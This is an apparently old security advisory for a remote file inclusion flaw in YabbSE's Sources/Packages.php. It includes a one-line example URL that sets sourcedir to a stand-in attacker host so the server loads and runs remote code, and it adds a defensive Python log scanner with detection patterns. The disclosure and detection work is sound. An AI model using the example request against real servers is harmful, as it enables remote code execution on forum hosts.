YabbSE Remote Code Execution Vulnerability ( By Mindwarper :: mindwarper (at) hush (dot) com :: )
<------- ------->
----------------------
Vendor Information:
----------------------
Homepage : http://www.yabbse.org
Vendor : informed
Mailed advisory: 21/01/02
Vendor Response : None
----------------------
Affected Versions:
----------------------
All versions prior to 1.5.0
----------------------
Vulnerability:
----------------------
YabbSE keeps all of its function includes in a directory called "Sources", which
is not protected. Inside this directory is a file called Packages.php. This
file is meant to be included, not called directly, but an attacker who calls
it directly may cause the script to run arbitrary remote code.
Below are a couple of the first lines in Packages.php:
********
..
global $adminplver;
$Packagesphpver="YaBB SE 1.4.1";
$safe_mode = ini_get("safe_mode");
$pacmanver = "1.4.1";
include_once("$sourcedir/Packer.php");
..
********
We can see here that the variable $sourcedir is never defined in this file before
it is used in the include path, and therefore may be defined by the requester
through global injection.
Example:
http://victim/yabbse/Sources/Packages.php?sourcedir=http://attacker/
where the attacker's server hosts a file called Packer.php.
An attacker may execute remote code on the server with webserver permissions.
Side-note: An attacker may also use this file for an XSS attack on the server.
----------------------
Solution:
----------------------
Please check the vendor's website for new patches.
As a temporary solution, create a .htaccess file that contains 'Deny from all'.
Place it in the /Sources/ directory and that should block remote users from accessing it.
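To check whether a file under Sources has already been requested this way, the following added example (not part of the original advisory) scans web server access-log lines for direct requests to that directory and for a sourcedir query parameter. The log lines, addresses and host names are constructed, and Common/Combined Log Format is assumed.

```python
import re
from urllib.parse import urlsplit, unquote, parse_qs

# Common/Combined Log Format (assumed): client ... "METHOD target PROTO" status
LINE_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) [^"]*" (\d{3})')
# Any script requested directly from the Sources include directory.
SOURCES_RE = re.compile(r'/Sources/[^/]+\.php$', re.IGNORECASE)
# A scheme prefix would make include_once() fetch Packer.php from another host.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)


def classify(line):
    """Return (client, finding, status) for a suspicious line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, target, status = m.group(1), m.group(2), int(m.group(3))
    url = urlsplit(target)
    if not SOURCES_RE.search(unquote(url.path)):
        return None
    # parse_qs percent-decodes, so sourcedir=http%3A%2F%2F... is caught too.
    values = parse_qs(url.query, keep_blank_values=True).get("sourcedir", [])
    if any(SCHEME_RE.match(v.strip()) for v in values):
        finding = "remote-sourcedir"
    elif values:
        finding = "sourcedir-set"
    else:
        finding = "direct-request"
    return client, finding, status


def scan(lines):
    """Classify every line; a 403 status means the Deny rule answered."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log lines (documentation addresses, example host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Feb/2003:10:00:01 +0000] "GET /yabbse/index.php?board=1 HTTP/1.0" 200 5120',
    '198.51.100.7 - - [01/Feb/2003:10:02:13 +0000] "GET /yabbse/Sources/Packages.php?sourcedir=http://files.example.net/ HTTP/1.0" 200 312',
    '198.51.100.7 - - [01/Feb/2003:10:02:40 +0000] "GET /yabbse/Sources/Packages.php?sourcedir=http%3A%2F%2Ffiles.example.net%2F HTTP/1.0" 403 210',
    '203.0.113.5 - - [01/Feb/2003:10:05:00 +0000] "GET /yabbse/Sources/Packages.php?sourcedir=/tmp HTTP/1.0" 200 300',
    '203.0.113.5 - - [01/Feb/2003:10:06:00 +0000] "GET /yabbse/Sources/Packages.php HTTP/1.0" 403 210',
]

if __name__ == "__main__":
    for client, finding, status in scan(SAMPLE_LOG):
        print(f"{client:15} {finding:17} HTTP {status}")
```

An access log records only the query string, so a sourcedir value sent any other way shows up here only as a direct-request finding.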
----------------------
Greetz:
----------------------
Hawkje, Truckle, Cyon, daemorhedron, Mithrandir
<------- ------->